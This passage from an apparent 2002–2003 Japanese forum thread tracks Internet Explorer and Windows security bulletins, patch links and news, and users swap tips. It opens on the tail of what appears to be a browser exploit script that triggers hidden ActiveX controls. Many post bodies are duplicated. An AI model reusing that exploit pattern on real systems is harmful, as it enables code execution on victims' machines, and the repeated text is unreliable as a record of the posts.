"-00aa003b7a11><param name=Command value=Close></object>')");
f("javascript:c1.Click();c2.Click();");
close();
}
</script>
254 :名無しさん@お腹いっぱい。:02/11/28 23:59
>>253
HHは秋田、RDSの貼れよ。
HHは秋田、RDSの貼れよ。
255 :sned:02/11/29 06:51
( ・_・)y─~~~ pcにメールを入れない hotmailかyahooを使う
が、hotmailはメルアドしれたら見られる可能性大...
urlにメアド入れて...( ・×・)y─~~~
が、hotmailはメルアドしれたら見られる可能性大...
urlにメアド入れて...( ・×・)y─~~~
256 :名無しさん@お腹いっぱい。:02/11/29 15:20
IE累積パッチをめぐる議論で思うこと
http://www.zdnet.co.jp/news/0211/28/cead_vamosi.html
>先週発行されたIE用の累積パッチをめぐって取りざたされている問題がある。
>シロクロはさておき、この問題は情報の公開・非公開について考える良いきっかけだ
http://www.zdnet.co.jp/news/0211/28/cead_vamosi.html
>先週発行されたIE用の累積パッチをめぐって取りざたされている問題がある。
>シロクロはさておき、この問題は情報の公開・非公開について考える良いきっかけだ
257 :名無しさん@お腹いっぱい。:02/11/29 17:01
>>255
おい、ホトメはセキュリティ対策とってないんか?
おい、ホトメはセキュリティ対策とってないんか?
258 :名無しさん@お腹いっぱい。:02/12/03 06:51
漏れら極悪非道のageブラザーズ!
今日もネタもないのにageてやるからな!
 ̄ ̄∨ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄
∧_∧ ∧_∧ age
(・∀・∩)(∩・∀・) age
(つ 丿 ( ⊂) age
( ヽノ ヽ/ ) age
し(_) (_)J
今日もネタもないのにageてやるからな!
 ̄ ̄∨ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄
∧_∧ ∧_∧ age
(・∀・∩)(∩・∀・) age
(つ 丿 ( ⊂) age
( ヽノ ヽ/ ) age
し(_) (_)J
259 :名無しさん@Emacs:02/12/04 13:18
>> http://itpro.nikkeibp.co.jp/members/ITPro/SEC_CHECK/20021203/1/
> 今度は“完全な対策”にとんでもない副作用――「Windowsの深刻なホール」続編
> MDAC 2.7へのアップグレードで過去のホールが再発する
> 今度は“完全な対策”にとんでもない副作用――「Windowsの深刻なホール」続編
> MDAC 2.7へのアップグレードで過去のホールが再発する
260 :MS02-068:02/12/05 10:19
「MS02-068: Internet Explorer 用の累積的な修正プログラム (324929) 」
http://www.microsoft.com/japan/technet/security/bulletin/ms02-068ov.asp
概要
この修正プログラムは、Internet Explorer に影響を及ぼすセキュリティ上の
問題を排除する累積的な修正プログラムです。
以前に公開された MS02-066 : Internet Explorer 用の累積的な修正プログラム
(Q328970) で修正された問題に加えて、新たに 1つの問題を排除します。
対象となる製品
・ Microsoft Internet Explorer 5.5 Service Pack 2
・ Microsoft Internet Explorer 6
・ Microsoft Internet Explorer 6 Service Pack 1
Microsoft Internet Explorer 5.01 は、この問題の影響を受けません。
http://www.microsoft.com/japan/technet/security/bulletin/ms02-068ov.asp
概要
この修正プログラムは、Internet Explorer に影響を及ぼすセキュリティ上の
問題を排除する累積的な修正プログラムです。
以前に公開された MS02-066 : Internet Explorer 用の累積的な修正プログラム
(Q328970) で修正された問題に加えて、新たに 1つの問題を排除します。
対象となる製品
・ Microsoft Internet Explorer 5.5 Service Pack 2
・ Microsoft Internet Explorer 6
・ Microsoft Internet Explorer 6 Service Pack 1
Microsoft Internet Explorer 5.01 は、この問題の影響を受けません。
261 :名無しさん@お腹いっぱい。:02/12/05 13:25
>>259 なんだかワケわからん状態になってきてるよね(w
もう少し整理して欲しいね。
ttp://www.st.ryukoku.ac.jp/security/vuln.html#20021126のほうが整理されてる。
もう少し整理して欲しいね。
ttp://www.st.ryukoku.ac.jp/security/vuln.html#20021126のほうが整理されてる。
262 :名無しさん@お腹いっぱい。:02/12/06 11:15
>>260 Windows Updateでなかなか落ちてこないことがあるようなので、
【修正プログラム】
・ Internet Explorer 6 Service Pack 1
http://download.microsoft.com/download/ie6sp1/32secpac/6_sp1/W98NT42KMeXP/JA/q324929.exe
・ Internet Explorer 6
http://download.microsoft.com/download/IE60/32secpac/6/W98NT42KMeXP/JA/q324929.exe
・ Internet Explorer 5.5 Service Pack 2
http://download.microsoft.com/download/ie55sp2/32secpac/5.5_sp2/W98NT42KMe/JA/q324929.exe
注意: 64bit 版の Windows XP は、以下の Internet Explorer 6 Service Pack 1 (64bit) の適用をすること。
・Internet Explorer 6 Service Pack 1 (64bit)
http://download.microsoft.com/download/ie6sp1/32secpac/6_sp1/W64XP/JA/q324929.exe
修正プログラムのダウンロード方法およびインストール方法については、こちら
http://www.microsoft.com/japan/security/square/guard/a04g16.asp
【修正プログラム】
・ Internet Explorer 6 Service Pack 1
http://download.microsoft.com/download/ie6sp1/32secpac/6_sp1/W98NT42KMeXP/JA/q324929.exe
・ Internet Explorer 6
http://download.microsoft.com/download/IE60/32secpac/6/W98NT42KMeXP/JA/q324929.exe
・ Internet Explorer 5.5 Service Pack 2
http://download.microsoft.com/download/ie55sp2/32secpac/5.5_sp2/W98NT42KMe/JA/q324929.exe
注意: 64bit 版の Windows XP は、以下の Internet Explorer 6 Service Pack 1 (64bit) の適用をすること。
・Internet Explorer 6 Service Pack 1 (64bit)
http://download.microsoft.com/download/ie6sp1/32secpac/6_sp1/W64XP/JA/q324929.exe
修正プログラムのダウンロード方法およびインストール方法については、こちら
http://www.microsoft.com/japan/security/square/guard/a04g16.asp
263 :名無しさん@お腹いっぱい。:02/12/06 13:18
MS02-067,MS02-068解説
『IEとOutlook 2002にセキュリティ・ホール,深刻度はいずれも「警告」』
http://itpro.nikkeibp.co.jp/free/ITPro/NEWS/20021205/1/
『IEとOutlook 2002にセキュリティ・ホール,深刻度はいずれも「警告」』
http://itpro.nikkeibp.co.jp/free/ITPro/NEWS/20021205/1/
264 :名無しさん@Emacs:02/12/06 14:35
265 :名無しさん@お腹いっぱい。:02/12/07 00:34
>>259
リンクに入れないよー。何度やってもクッキーOKにしても跳ね返される。
リンクに入れないよー。何度やってもクッキーOKにしても跳ね返される。
266 :名無しさん@お腹いっぱい。:02/12/07 00:41
>>265
もちろん会員登録はしてるんだろうな
もちろん会員登録はしてるんだろうな
267 :名無しさん@お腹いっぱい。:02/12/07 00:51
>>266
入れました。最近いかないのでクッキー常拒否&制限サイト設定してました。
制限サイト設定がだめだったみたい。このサイト異常に大量のクッキーほしがる
からなんかやなんだよねえ。スレ汚しスマソ。
入れました。最近いかないのでクッキー常拒否&制限サイト設定してました。
制限サイト設定がだめだったみたい。このサイト異常に大量のクッキーほしがる
からなんかやなんだよねえ。スレ汚しスマソ。
268 :名無しさん@お腹いっぱい。:02/12/07 00:54
269 :名無しさん@お腹いっぱい。:02/12/07 02:12
ひとつひきだしを閉めると
違うひきだしが飛び出る
・・・えんえんと続く
「誰か来てー!こっち押さえてるから そっち閉めてー!!」
違うひきだしが飛び出る
・・・えんえんと続く
「誰か来てー!こっち押さえてるから そっち閉めてー!!」
270 :MS02-068:02/12/07 12:39
Internet Explorer 用の累積的な修正プログラム (324929) (MS02-068)
深刻度を「警告」から「緊急」に変更
http://www.microsoft.com/japan/technet/security/bulletin/ms02-068.asp
緊急 (Critical):
この脆弱性が悪用された場合、Code Red や Nimda のようなインターネット
ワームがユーザーの操作なしで蔓延する可能性があります。
重要 (Important):
この脆弱性が悪用された場合、ユーザーのデータの機密性、完全性または
アベイラビリティが侵害される可能性があります。または、処理中のリソースの
完全性またはアベイラビリティが侵害される可能性があります。
警告 (Moderate):
この脆弱性が悪用された場合、既定の構成、監査または悪用が困難であること
などの要素により、悪用される可能性は大幅に緩和されます。
注意 (Low):
この脆弱性の悪用は非常に困難です。または影響はわずかです。
深刻度を「警告」から「緊急」に変更
http://www.microsoft.com/japan/technet/security/bulletin/ms02-068.asp
緊急 (Critical):
この脆弱性が悪用された場合、Code Red や Nimda のようなインターネット
ワームがユーザーの操作なしで蔓延する可能性があります。
重要 (Important):
この脆弱性が悪用された場合、ユーザーのデータの機密性、完全性または
アベイラビリティが侵害される可能性があります。または、処理中のリソースの
完全性またはアベイラビリティが侵害される可能性があります。
警告 (Moderate):
この脆弱性が悪用された場合、既定の構成、監査または悪用が困難であること
などの要素により、悪用される可能性は大幅に緩和されます。
注意 (Low):
この脆弱性の悪用は非常に困難です。または影響はわずかです。
271 :名無しさん@Emacs:02/12/07 12:46
>>270
> http://www.microsoft.com/japan/technet/security/bulletin/ms02-068.asp
Internet Explorer 5.01 なし
Internet Explorer 5.5 緊急
Internet Explorer 6.0 緊急
どういうプログラミングしてんだよ。
> http://www.microsoft.com/japan/technet/security/bulletin/ms02-068.asp
Internet Explorer 5.01 なし
Internet Explorer 5.5 緊急
Internet Explorer 6.0 緊急
どういうプログラミングしてんだよ。
272 :名無しさん@お腹いっぱい。:02/12/07 15:25
これ、前に当てたのを手直ししたからもういっぺん当てなおせってことなのか?
273 :名無しさん@お腹いっぱい。:02/12/07 15:35
324929を落としてみてもう一度当ててみたが、再起動要求がなかった。
ってことはすでに当たってたってことか。よくわからんな。
ってことはすでに当たってたってことか。よくわからんな。
274 :名無しさん@お腹いっぱい。:02/12/07 15:38
275 :名無しさん@お腹いっぱい。:02/12/07 15:44
>>272-273 MS02-068 Q324929は深刻度の変更のみ。修正プログラムには変更なし。
すでにパッチ適用済みの人は不要。
http://www.microsoft.com/japan/technet/security/bulletin/ms02-068.asp
すでにパッチ適用済みの人は不要。
http://www.microsoft.com/japan/technet/security/bulletin/ms02-068.asp
>>274-275
了解しますた。アリが屯。
了解しますた。アリが屯。
277 :名無しさん@お腹いっぱい。:02/12/08 15:59
age
278 :名無しさん@お腹いっぱい:02/12/09 05:48
Microsoft VM JDBC クラスの問題により、コードが実行される (Q329077) (MS02-052) は、Windows Update以外に、ダウンロードできないのでしょうか?
279 :名無しさん@お腹いっぱい。:02/12/09 05:50
レジストで、TSHOOT.TSHOOTCtrl.1 を検索してみて。
TSHOOT.TSHOOTCtrl.1 が ActiveX/COM
{4B106874-DD36-11D0-8B44-00A024DD9EFF}を参照しているのが
おかしいらしいが、、、(ウインドクター)。
もし、あったら、、、、ブルブル、、?
TSHOOT.TSHOOTCtrl.1 が ActiveX/COM
{4B106874-DD36-11D0-8B44-00A024DD9EFF}を参照しているのが
おかしいらしいが、、、(ウインドクター)。
もし、あったら、、、、ブルブル、、?
280 :名無しさん@お腹いっぱい。:02/12/09 08:43
>>278 調べればすぐにわかることを・・・
http://www.microsoft.com/japan/technet/treeview/default.asp?url=/japan/technet/security/current.asp
>このセキュリティ修正プログラムは特殊なものであり、Windows Update
>からのみ入手可能となっております。
http://www.microsoft.com/japan/technet/treeview/default.asp?url=/japan/technet/security/current.asp
>このセキュリティ修正プログラムは特殊なものであり、Windows Update
>からのみ入手可能となっております。
282 :名無しさん@お腹いっぱい。:02/12/09 12:12
>>260>>270 q324929 MS02-068深刻度変更の解説
IEのセキュリティ・ホール,深刻度を最悪の「緊急」に変更
http://itpro.nikkeibp.co.jp/free/ITPro/NEWS/20021209/1/
IEのセキュリティ・ホール,深刻度を最悪の「緊急」に変更
http://itpro.nikkeibp.co.jp/free/ITPro/NEWS/20021209/1/
283 :名無しさん@お腹いっぱい。:02/12/10 08:17
age
284 :名無しさん@Emacs:02/12/11 12:25
>> 「ウイルスバスター」にバッファ・オーバーフロー
>> http://itpro.nikkeibp.co.jp/members/ITPro/SEC_CHECK/20021210/1/
> 製品が備えるメール検索機能で使用するポートに,直接接続されて大量の文字列を送信されると,バッファ・オーバーフローが発生
>> http://itpro.nikkeibp.co.jp/members/ITPro/SEC_CHECK/20021210/1/
> 製品が備えるメール検索機能で使用するポートに,直接接続されて大量の文字列を送信されると,バッファ・オーバーフローが発生
285 :名無しさん@お腹いっぱい。:02/12/11 16:42
「Windowsの深刻なホール」対策で発生するトラブルを解決する
トラブル相次ぐMDAC 2.7へのアップグレード,「警告」への対処がOSによって異なる
http://itpro.nikkeibp.co.jp/members/ITPro/SEC_CHECK/20021210/1/
>ようやく正確な情報が出揃った「Windowsの深刻なホール」であるが,トラブル
>はまだ続いている。“完全な対策”であるはずの MDAC 2.7 へのアップグレー
>ドがきちんと 実施できないケースが頻発しているようだ。アップグレード時に
>警告が出た場合の適切な対処方法が,Windows 95/95SE/NT 4.0 と Windows
>2000などでは異なることが原因だ。アップグレードできずに頭を抱えているユー
>ザーは,今回のコラムを一読してほしい。併せて今回のコラムでは,深刻度が
>「緊急」に急きょ変更されたInternet Explorer(IE)のセキュリティ・ホー
>ルなどについても解説する。
トラブル相次ぐMDAC 2.7へのアップグレード,「警告」への対処がOSによって異なる
http://itpro.nikkeibp.co.jp/members/ITPro/SEC_CHECK/20021210/1/
>ようやく正確な情報が出揃った「Windowsの深刻なホール」であるが,トラブル
>はまだ続いている。“完全な対策”であるはずの MDAC 2.7 へのアップグレー
>ドがきちんと 実施できないケースが頻発しているようだ。アップグレード時に
>警告が出た場合の適切な対処方法が,Windows 95/95SE/NT 4.0 と Windows
>2000などでは異なることが原因だ。アップグレードできずに頭を抱えているユー
>ザーは,今回のコラムを一読してほしい。併せて今回のコラムでは,深刻度が
>「緊急」に急きょ変更されたInternet Explorer(IE)のセキュリティ・ホー
>ルなどについても解説する。
286 :名無しさん@お腹いっぱい。:02/12/12 08:31
>>264関係 Microsoft Baseline Security Analyzer v1.1
http://pcweb.mycom.co.jp/news/2002/12/09/10.html
使ってみた人いる?
>IE5.01以降がインストールされたWindows 2000およびWindows XP上で動作し、
>次に挙げるシステムやソフトウェアをチェックできる。
>・Windows NT4.0(SP4以降)/2000/XP
>・Internet Information Server 4.0/5.0
>・SQL Server 7.0/2000
>・Internet Explorer 5.01以降
>・Office 2000/XP
http://pcweb.mycom.co.jp/news/2002/12/09/10.html
使ってみた人いる?
>IE5.01以降がインストールされたWindows 2000およびWindows XP上で動作し、
>次に挙げるシステムやソフトウェアをチェックできる。
>・Windows NT4.0(SP4以降)/2000/XP
>・Internet Information Server 4.0/5.0
>・SQL Server 7.0/2000
>・Internet Explorer 5.01以降
>・Office 2000/XP
287 :名無しさん@お腹いっぱい。:02/12/12 08:51
マイクロソフト,Netscapeでセキュリティ情報を閲覧できない問題に対応
http://itpro.nikkeibp.co.jp/free/ITPro/NEWS/20021211/1/
http://itpro.nikkeibp.co.jp/free/ITPro/NEWS/20021211/1/
288 :名無しさん@お腹いっぱい。:02/12/12 16:04
810030 Microsoft VMセキュリティ問題の修正プログラム 5.1MB
っていうのがWindows Updateで来てるね。現時点では詳細不明。
必要システム
Windows XP、Windows Millennium Edition、Windows NT(R) 4.0
Windows 98 Second Edition、Windows 98、Windows 95
っていうのがWindows Updateで来てるね。現時点では詳細不明。
必要システム
Windows XP、Windows Millennium Edition、Windows NT(R) 4.0
Windows 98 Second Edition、Windows 98、Windows 95
289 :名無しさん@お腹いっぱい。:02/12/12 16:11
290 :名無しさん@お腹いっぱい。:02/12/12 16:53
緊急と言われてもまったく落ちてこない、、、
直リンキボン
直リンキボン
291 :名無しさん@お腹いっぱい。:02/12/12 16:57
292 :名無しさん@お腹いっぱい。:02/12/12 17:04
しばらく待ったら落ちてきました。
293 :bloom:02/12/12 17:04
294 :名無しさん@お腹いっぱい。:02/12/12 17:34
ルータでポート135番塞いでたら、インストールに失敗した(恥
それにしてもWindowsUpdate重いぞ。
それにしてもWindowsUpdate重いぞ。
295 :名無しさん@お腹いっぱい。:02/12/12 17:36
>>290
痺れを切らして(5分待ち)途中でキャンセルしたらIE固まった。
正確には固まったというよりも、キャンセル処理が長い感じ。
これほんとに7分(ADSL8M実際は1.5Mくらい)で落ちるのか??
痺れを切らして(5分待ち)途中でキャンセルしたらIE固まった。
正確には固まったというよりも、キャンセル処理が長い感じ。
これほんとに7分(ADSL8M実際は1.5Mくらい)で落ちるのか??
296 :名無しさん@お腹いっぱい。:02/12/12 17:40
こっち↓にはまだ出ないね。VMの話だからIEの欄にもでるはずだよね?
http://www.microsoft.com/japan/technet/treeview/default.asp?url=/japan/technet/security/fix/ie6sp1.asp
http://www.microsoft.com/japan/technet/treeview/default.asp?url=/japan/technet/security/fix/ie6sp1.asp
297 :名無しさん@お腹いっぱい。:02/12/12 18:13
「MS02-069: Microsoft VM の問題により、システムが侵害される(810030)」
http://www.microsoft.com/japan/technet/security/bulletin/ms02-069ov.asp
「MS02-070: SMB 署名の問題により、グループ ポリシーが変更される (309376)」
http://www.microsoft.com/japan/technet/security/bulletin/ms02-070ov.asp
「MS02-071: Windows WM_TIMER メッセージ処理の問題により、権限がし昇格する(328310)」
http://www.microsoft.com/japan/technet/security/bulletin/ms02-071ov.asp
http://www.microsoft.com/japan/technet/security/bulletin/ms02-069ov.asp
「MS02-070: SMB 署名の問題により、グループ ポリシーが変更される (309376)」
http://www.microsoft.com/japan/technet/security/bulletin/ms02-070ov.asp
「MS02-071: Windows WM_TIMER メッセージ処理の問題により、権限がし昇格する(328310)」
http://www.microsoft.com/japan/technet/security/bulletin/ms02-071ov.asp
298 :名無しさん@お腹いっぱい。:02/12/12 18:15
×し昇格
○昇格
○昇格
299 :名無しさん@お腹いっぱい。:02/12/12 21:37
MS02-069解説
Microsoft VMに「緊急」のセキュリティ・ホ ール,Windowsユーザーはすぐに対策を
http://itpro.nikkeibp.co.jp/free/ITPro/NEWS/20021212/1/
Microsoft VMに「緊急」のセキュリティ・ホ ール,Windowsユーザーはすぐに対策を
http://itpro.nikkeibp.co.jp/free/ITPro/NEWS/20021212/1/
300 :名無しさん@お腹いっぱい。:02/12/12 21:55
「MS02-070: SMB 署名の問題により、グループ ポリシーが変更される (309376)」
(329170) の誤りだ>M$ まぁた間違えてやんの(w
301 :名無しさん@Emacs:02/12/12 22:15
http://www.pivx.com/larholm/unpatched/ ここには載ってない様だから新た
な奴らか。
マイクロソフトは12月12日,Windows OSやInternet Explorer(IE)などに含まれるJava仮想マシン「Microsoft VM」に8種類のセキュリティ・ホールがあることを明らかにした。
1. COMオブジェクトにアクセスされるセキュリティ・ホール
2. Codebase を偽装される2種類のセキュリティ・ホール
3. ダウンロードするサイトを偽装されるセキュリティ・ホール
4. JDBC API に関するセキュリティ・ホール
5. セキュリティ・マネージャの設定を無視できるセキュリティ・ホール
6. User.dirに関するセキュリティ・ホール
7. Java オブジェクトのインスタンスを作成されるセキュリティ・ホール
な奴らか。
マイクロソフトは12月12日,Windows OSやInternet Explorer(IE)などに含まれるJava仮想マシン「Microsoft VM」に8種類のセキュリティ・ホールがあることを明らかにした。
1. COMオブジェクトにアクセスされるセキュリティ・ホール
2. Codebase を偽装される2種類のセキュリティ・ホール
3. ダウンロードするサイトを偽装されるセキュリティ・ホール
4. JDBC API に関するセキュリティ・ホール
5. セキュリティ・マネージャの設定を無視できるセキュリティ・ホール
6. User.dirに関するセキュリティ・ホール
7. Java オブジェクトのインスタンスを作成されるセキュリティ・ホール
302 :名無しさん@お腹いっぱい。:02/12/12 23:54
windows update のほうではまだDLできんみたいだな。
303 :名無しさん@お腹いっぱい。:02/12/13 00:26
やっとDLできた。疲れる。
304 :名無しさん@お腹いっぱい。:02/12/14 16:47
>>297の
http://www.microsoft.com/japan/technet/security/bulletin/ms02-071.aspもきついな。
共有マシンのAdminの意味無いな。
http://www.microsoft.com/japan/technet/security/bulletin/ms02-071.aspもきついな。
共有マシンのAdminの意味無いな。
305 :名無しさん@お腹いっぱい。:02/12/14 17:08
Adminisutrator のユーザー名をそのままにしている香具師、
多いんだろう。
ユーザー名の変更ができるんだから、名前を NIMDA にしてもよい。
多いんだろう。
ユーザー名の変更ができるんだから、名前を NIMDA にしてもよい。
306 :名無しさん@お腹いっぱい。:02/12/14 17:10
× Adminisutrator
○ Administrator
○ Administrator
307 :MS02-066,MS02-068:02/12/16 23:10
MS02-066 更新、最大深刻度 : 緊急に変更
http://www.microsoft.com/japan/technet/security/bulletin/ms02-066.asp
但しMS02-068 に既に含まれている。MS02-068の累積的パッチの適用を推奨。
http://www.microsoft.com/japan/technet/security/bulletin/ms02-068.asp
http://www.microsoft.com/japan/technet/security/bulletin/ms02-066.asp
但しMS02-068 に既に含まれている。MS02-068の累積的パッチの適用を推奨。
http://www.microsoft.com/japan/technet/security/bulletin/ms02-068.asp
308 :名無しさん@Emacs:02/12/17 18:30
http://itpro.nikkeibp.co.jp/free/ITPro/NEWS/20021217/1/
Flash Playerにバッファ・オーバーフローのセキュリティ・ホール
対策は,最新バージョン6.0.65.0にバージョンアップすること。
影響を受けるのは,バージョン6.0.65.0未満
Flash Playerにバッファ・オーバーフローのセキュリティ・ホール
対策は,最新バージョン6.0.65.0にバージョンアップすること。
影響を受けるのは,バージョン6.0.65.0未満
309 :名無しさん@お腹いっぱい。:02/12/17 19:27
itiou sure tigai jya naino?>>308
310 :名無しさん@お腹いっぱい。:02/12/18 18:48
IPAが年末警報。特にIE/OEユーザ向けの記述になっている。
初心者に読ませるのにいいかも。
年 末 警 報−添付ファイルにご用心− −メールを選択しただけでも感染!!−
http://www.ipa.go.jp/security/topics/alert141218.html
初心者に読ませるのにいいかも。
年 末 警 報−添付ファイルにご用心− −メールを選択しただけでも感染!!−
http://www.ipa.go.jp/security/topics/alert141218.html
311 :cheshire-cat ◆PhCATJR.v6 :02/12/18 20:17
312 :名無しさん@Emacs:02/12/18 21:13
http://www.eeye.com/html/Research/Advisories/AD20021216.html
Macromedia Shockwave Flash Malformed Header Overflow #2
A corrupt file may be placed on a website or in some cases within an HTML email.
Macromedia Shockwave Flash Malformed Header Overflow #2
A corrupt file may be placed on a website or in some cases within an HTML email.
313 :名無しさん@お腹いっぱい。:02/12/19 09:18
スレ違いスマソ。
「MS02-072: Windows Shell の未チェックのバッファによりシステムが侵害される (329390)」
http://www.microsoft.com/japan/technet/security/bulletin/ms02-072ov.asp
対象となる製品
・Windows XP Home Edition
・Windows XP Professional
・Windows XP Tablet PC Edition
・Windows XP Media Center Edition
最大深刻度:(緊急)
修正プログラム
・Windows XP 32-bit
http://download.microsoft.com/download/f/2/e/f2e56679-17b3-4ec7-b535-2eee3b1212d4/Q329390_WXP_SP2_x86_JPN.exe
・Windows XP 64-bit
http://download.microsoft.com/download/6/6/9/6697eeaa-8409-42a6-b9a7-ed05b98c341a/Q329390_WXP_SP2_ia64_JPN.exe
「MS02-072: Windows Shell の未チェックのバッファによりシステムが侵害される (329390)」
http://www.microsoft.com/japan/technet/security/bulletin/ms02-072ov.asp
対象となる製品
・Windows XP Home Edition
・Windows XP Professional
・Windows XP Tablet PC Edition
・Windows XP Media Center Edition
最大深刻度:(緊急)
修正プログラム
・Windows XP 32-bit
http://download.microsoft.com/download/f/2/e/f2e56679-17b3-4ec7-b535-2eee3b1212d4/Q329390_WXP_SP2_x86_JPN.exe
・Windows XP 64-bit
http://download.microsoft.com/download/6/6/9/6697eeaa-8409-42a6-b9a7-ed05b98c341a/Q329390_WXP_SP2_ia64_JPN.exe
314 :bloom:02/12/19 09:34
315 :名無しさん@お腹いっぱい。:02/12/19 13:09
>>313 Windows XPに「緊急」のセキュリティ・ホール,任意のプログラムを実行させられる
http://itpro.nikkeibp.co.jp/free/ITPro/NEWS/20021219/1/
http://itpro.nikkeibp.co.jp/free/ITPro/NEWS/20021219/1/
316 :cheshire-cat ◆PhCATJR.v6 :02/12/20 01:09
まさかhome版で64ビット用パッチ入れようとした人、居ないっすよね。
ちょっと初心者板で気になったんで。。。。。
ちょっと初心者板で気になったんで。。。。。
317 :名無しさん@お腹いっぱい。:02/12/20 01:17
318 :名無しさん@お腹いっぱい。:02/12/20 01:31
Windows Updateに上がってるから、普通はWindows Updateをすると思いたい…。
319 :名無しさん@お腹いっぱい。:02/12/20 20:45
320 :名無しさん@Emacs:02/12/20 20:58
321 :名無しさん@お腹いっぱい。:03/01/08 12:44
2002年末に相次いだ「緊急」のセキュリティ・ホール,改めて確認を
深刻な Windows Shell のホール,「スパイ・データ」の出現に要警戒
http://itpro.nikkeibp.co.jp/members/ITPro/SEC_CHECK/20030107/1/
深刻な Windows Shell のホール,「スパイ・データ」の出現に要警戒
http://itpro.nikkeibp.co.jp/members/ITPro/SEC_CHECK/20030107/1/
322 :名無しさん@お腹いっぱい。:03/01/08 12:46
古いネタだけど、もし64bit版放りこんで壊れたら700円請求できるんだよね?
323 :名無しさん@お腹いっぱい。:03/01/08 13:26
>>322 なんで700円?
(^^)
325 :名無しさん@お腹いっぱい。:03/01/21 15:03
IEのXSSバグで任意サイトのCookieが漏洩
http://slashdot.jp/article.pl?sid=03/01/18/1226227
>jbeef曰く、"現時点でIEはcookieを盗まれ得るブラウザである。cookieを盗ま
>れると致命傷となるサイトの利用には注意が必要だ。12月に2つのcookie が
>漏洩する脆弱性が報告されたが、まだパッチが出ていない。(略)
http://slashdot.jp/article.pl?sid=03/01/18/1226227
>jbeef曰く、"現時点でIEはcookieを盗まれ得るブラウザである。cookieを盗ま
>れると致命傷となるサイトの利用には注意が必要だ。12月に2つのcookie が
>漏洩する脆弱性が報告されたが、まだパッチが出ていない。(略)
326 :名無しさん@お腹いっぱい。:03/01/21 15:04
IEのCookieをオフにしても有効なCookieモドキ
http://slashdot.jp/article.pl?sid=03/01/19/2134203
http://slashdot.jp/article.pl?sid=03/01/19/2134203
327 :名無しさん@お腹いっぱい。:03/01/23 11:37
OEではなくOutlookだが、
「MS03-003: Outlook 2002 が Version 1 の Exchange Server Security
証明書を処理する方法に存在する問題により、情報が漏えいする (812262)」
http://www.microsoft.com/japan/technet/security/bulletin/ms03-003ov.asp
最大深刻度:警告
「MS03-003: Outlook 2002 が Version 1 の Exchange Server Security
証明書を処理する方法に存在する問題により、情報が漏えいする (812262)」
http://www.microsoft.com/japan/technet/security/bulletin/ms03-003ov.asp
最大深刻度:警告
328 :名無しさん@お腹いっぱい。:03/01/27 22:21
Microsoft,Windows Server 2003用にIE新版を用意
http://itpro.nikkeibp.co.jp/free/NT/NEWS/20030127/4/
http://itpro.nikkeibp.co.jp/free/NT/NEWS/20030127/4/
329 :名無しさん@お腹いっぱい。:03/01/30 11:03
Windows用ブラウザ「Opera 7」の製品版,ノルウェーのオペラがリリース
http://itpro.nikkeibp.co.jp/free/ITPro/USNEWS/20030130/6/
http://www.opera.com/
軽快ブラウザ「Opera」Vol.19
http://pc2.2ch.net/test/read.cgi/win/1043220804/l50
http://itpro.nikkeibp.co.jp/free/ITPro/USNEWS/20030130/6/
http://www.opera.com/
軽快ブラウザ「Opera」Vol.19
http://pc2.2ch.net/test/read.cgi/win/1043220804/l50
330 :MS03-004:03/02/06 08:28
MS03-004 Cumulative Patch for Internet Explorer (810847)
・Who should read this bulletin: Customers using Microsoft® Internet Explorer.
・Impact of vulnerability: Allow an attacker to execute commands on a user’s system.
・Maximum Severity Rating: Critical
・Recommendation: Customers should install the patch immediately.
・Affected Software:
Microsoft Internet Explorer 5.01
Microsoft Internet Explorer 5.5
Microsoft Internet Explorer 6.0
・End User Bulletin: An end user version of this bulletin is available at:
http://www.microsoft.com/security/security_bulletins/ms03-004.asp
・Who should read this bulletin: Customers using Microsoft® Internet Explorer.
・Impact of vulnerability: Allow an attacker to execute commands on a user’s system.
・Maximum Severity Rating: Critical
・Recommendation: Customers should install the patch immediately.
・Affected Software:
Microsoft Internet Explorer 5.01
Microsoft Internet Explorer 5.5
Microsoft Internet Explorer 6.0
・End User Bulletin: An end user version of this bulletin is available at:
http://www.microsoft.com/security/security_bulletins/ms03-004.asp
331 :名無しさん@お腹いっぱい。:03/02/06 09:20
>>330 Windows Updateで更新可
332 :MS03-004: Internet Explorer 用の累積的な修正プログラム (810847):03/02/06 12:16
IEにまたもや「緊急」のセキュリティ・ホール,すぐにWindows Updateの利用を
http://itpro.nikkeibp.co.jp/free/ITPro/NEWS/20030206/1/
マイクロソフトは2月6日,Internet Explorer(IE)の新たなセキュリティ・ホールとその
パッチを公開した。セキュリティ・ホールを悪用されると,WebページやHTMLメールを 閲覧しただけで,ウイルスなどの悪意があるプログラムを送り込まれて実行させられ
る恐れがある。対策は「Windows Update」などを利用してパッチを適用すること。最大
深刻度は「緊急(Critical)」なので,Windowsユーザーは早急にパッチを適用する必要
がある。
http://itpro.nikkeibp.co.jp/free/ITPro/NEWS/20030206/1/
マイクロソフトは2月6日,Internet Explorer(IE)の新たなセキュリティ・ホールとその
パッチを公開した。セキュリティ・ホールを悪用されると,WebページやHTMLメールを 閲覧しただけで,ウイルスなどの悪意があるプログラムを送り込まれて実行させられ
る恐れがある。対策は「Windows Update」などを利用してパッチを適用すること。最大
深刻度は「緊急(Critical)」なので,Windowsユーザーは早急にパッチを適用する必要
がある。
333 :MS03-004(Q810847):03/02/06 12:42
修正プログラム
・ Internet Explorer 6 Service Pack 1 (WU)
http://download.microsoft.com/download/e/6/e/e6ee3524-714d-4b1f-81c1-5ac1682e9048/q810847.exe
・ Internet Explorer 6 (WU)
http://download.microsoft.com/download/d/5/b/d5b9d2d5-401a-46f9-b8d2-aad6e62f7216/q810847.exe
・ Internet Explorer 5.5 Service Pack 2 (WU)
http://download.microsoft.com/download/2/7/e/27e15564-6035-47de-a42c-c72f35d0492a/q810847.exe
・ Internet Explorer 5.01 Service Pack 3 for Windows 2000 (WU)
http://download.microsoft.com/download/1/0/b/10b3e8d5-a6f6-4b32-b0af-318d73693e77/q810847.exe
注意: 64bit 版の Windows XP をお使いのお客様は、
以下の Internet Explorer 6 Service Pack 1 (64bit) の適用を
お願いします。
・ Internet Explorer 6 Service Pack 1 (64bit) (WU)
http://download.microsoft.com/download/4/3/1/431f40eb-c7ea-4616-ab48-1f9fbba92409/q810847.exe
(WU) の付いている修正プログラムは Windows Update から
インストールすることもできます。
対象となる製品
・ Internet Explorer 6 Service Pack 1
・ Internet Explorer 6 for Windows XP
・ Internet Explorer 5.5 Service Pack 2
